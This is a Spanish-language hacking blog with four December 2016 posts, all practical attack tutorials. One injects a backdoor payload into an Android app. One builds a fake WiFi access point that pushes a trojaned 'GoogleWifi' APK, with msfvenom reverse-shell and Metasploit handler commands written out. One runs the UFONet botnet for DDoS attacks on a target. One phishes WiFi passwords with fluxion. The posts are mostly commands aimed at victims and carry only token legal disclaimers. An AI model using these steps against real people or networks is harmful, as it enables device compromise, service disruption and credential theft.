viernes, 23 de diciembre de 2016

Infectar una app fácil

Hola amigos:

Hace unos posts, hablábamos de cómo inyectar un payload de android en una app, y lo hacíamos a mano.

En esta ocasión, vamos a presentar un script que nos lo automatizará. Este script se llama backdoor-apk y lo descargamos de https://github.com/dana-at-cp/backdoor-apk

Lo descomprimimos

unzip backdoor-apk-master.zip

Nos vamos al directorio /backdoor-apk-master/backdoor-apk

Copiamos la app víctima dentro de este mismo directorio.

Y Ejecutamos:

./backdoor-apk.sh <app_victima>

Ojo, es importante poner en el mismo directorio de backdoor-apk.sh la app objetivo, pues si no, nos dará un error.

Y completamos lo que nos piden (tipo de payload, IP local y puerto de destino).





La app infectada la podremos encontrar en el subdirectorio /original/dist/

Podemos iniciar metasploit preparadito para escuchar el payload con

msfconsole -r backdoor-apk.rc






Para borrar los archivos generados y poder volver a usar el script:

./cleanup.sh.

Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
  • Facebook: facebook.com/Manugomez1977
  • Twitter: @manugomez1977
  • Instagram: @MANUGOMEZ1977
Me gustaría agradeceros vuestras visitas, vuestras dudas y vuestro apoyo que he tenido en estos 12 meses de vida del blog. Intentaré seguir posteando y, por supuesto, seguir aprendiendo (que me queda mucho todavía).

Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.

Felices fiestas y ¡¡¡ Happy Hacking !!!


jueves, 15 de diciembre de 2016

Portal cautivo con troyano

En primer lugar, creamos el payload

msfvenom -p android/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=4895 -o meterpreter.apk



Si queremos, crearemos una aplicación falsa que supuestamente nos dé conexión internet. Infectamos la aplicación GoogleWifi tal y como vimos en el post http://manugomez1977.blogspot.com.es/2016/10/infectando-apk.html

Creamos una página web parecida a la que sigue a continuación




Lo copiaremos todo en una carpeta llamada, por ejemplo GoogleWifi, dentro de /var/www/

editamos 000-default.conf y añadimos



Editamos el archivo /etc/apache2/ports.conf y añadimos



Editamos el archivo /etc/apache2/sites-available/000-default.conf y añadimos



Editamos /etc/apache2/sites-enabled/000-default.conf y añadimos (si no ya está relleno, porque a veces se rellena automáticamente)



Iniciamos el servidor apache

service apache2 start

Creamos un AP falso (si tenéis alguna duda, consultad el post:
http://manugomez1977.blogspot.com.es/2016/06/crear-una-red-wifi-falsa.html) de la siguiente manera (en mi caso, wlan0 da internet y wlan1 es la red falsa):

En una terminal ponemos:

ifconfig wlan1 up
airmon-ng start wlan1
airbase-ng -c 1 -e GoogleWifi wlan1

En otra terminal:ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-port 55555
iptables -t nat -I PREROUTING -p tcp --dport 4895 -j ACCEPT
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0



En otra terminal, abrimos metasploit:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST 10.0.0.1
set LPORT 4895
exploit

Cuando la víctima abra la app:




Se iniciará meterpreter, en ese momento, abriremos una nueva terminal y ponemos:
iptables -t nat -I PREROUTING -s <ip_victima> -p tcp -j ACCEPT
iptables -t nat -A PREROUTING -s <ip_victima> -p tcp -j ACCEPT


Para darle así internet.










viernes, 9 de diciembre de 2016

Ddos con UFONET

Ufonet es una botnet para ataques DoS, que utiliza servidores vulnerables para realizar el ataque.

Nos descargamos Ufonet de:




Descomprimimos

unzip ufonet-master.zip

accedemos a la carpeta ufonet-master



Debemos tener instalado Python 2.x.e instalar las dependencias (si es que no las tenemos ya instaladas)

apt-get install python (posiblemente ya lo tengáis instalado).

apt-get install python-pycurl python-geoip



El modo de usarlo es el siguiente (es la salida de ./ufonet -h)

Usage: UFONet.py [options]

 UFONet - DDoS Botnet via Web Abuse - by psy

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')
Es aconsejable iniciar el servicio tor y privoxy.

En primer lugar, descargamos y actualizamos zombies:

./ufonet --proxy=http://127.0.0.1:8118 --download-zombies



Contestamos que sí (y)



./ufonet --proxy=http://127.0.0.1:8118 --upload-zombies

Para buscar zombies:

./ufonet --d dorks.txt

Acto seguido, nos pedirá si queremos actualizar nuestra base de datos de zombies, a lo cual diremos que sí.

Recomiendo no hacer esto último con proxys, porque puede dar error.

Para realizar el ataque debemos poner

./ufonet --proxy=http://127.0.0.1:8118 -a <direccion victima con http:// o con https:// incluído>

Si queremos, podemos usar la Gui:

./ufonet --gui





Editando el archivo dorks.txt y añadiendo más dorks, podremos buscar posbiles zombies




IMPORTANTE: No cometáis delitos.

Sígueme:
  • Twitter: @manugomez1977
  • Instagram: MANGOMEZ1977
  • Facebook: facebook.com/Mangomez1977

viernes, 2 de diciembre de 2016

Sacando contraseñas wifi con fluxion

Hola a todos.

En este post vamos a ver cómo podemos sacar la contraseña wifi de una víctima a través de ingeniería social.

La idea es bloquear a la víctima de su propia red wifi, para crear nosotros otra con el mismo nombre, de tal modo que se conecte a nosotros. Cuando esto pase, no podrá navegar, pidiéndole la contraseña wifi por motivos de seguridad, con lo que la víctima, la ingresará y le volveremos a dar su propia señal wifi.

Para ello, Nos descargamos fluxion de https://github.com/deltaxflux/fluxion



Descomprimimos



Instalamos

./Installer



Una vez instalado

./fluxion



Seleccionamos el idioma

y el canal




Cuando acabemos, cerramos la ventana.



Seleccionamos la red a atacar



Seleccionaré 1



Seleccionamos la interfaz. Elegiré 1





Seleccionamos idioma del login, y saldrán varias ventanas que no debes cerrar.



La víctima se ha conectado, sin embargo, no le conecta. Le aparece una página que dice que debe  introducir la contraseña.



Cuando la víctima meta la contraseña:



Como hemos visto anteriormente, captura el handshake. Esto es debido a que, si la víctima no introduce la contraseña correcta, fluxion lo detecta y le vuelve a pedir la misma.

No utilices este conocimiento para fines ilegales.

Sígueme:
  • twitter: @manugomez1977
  • instagram: MANUGOMEZ1977
  • facebook: Manugomez1977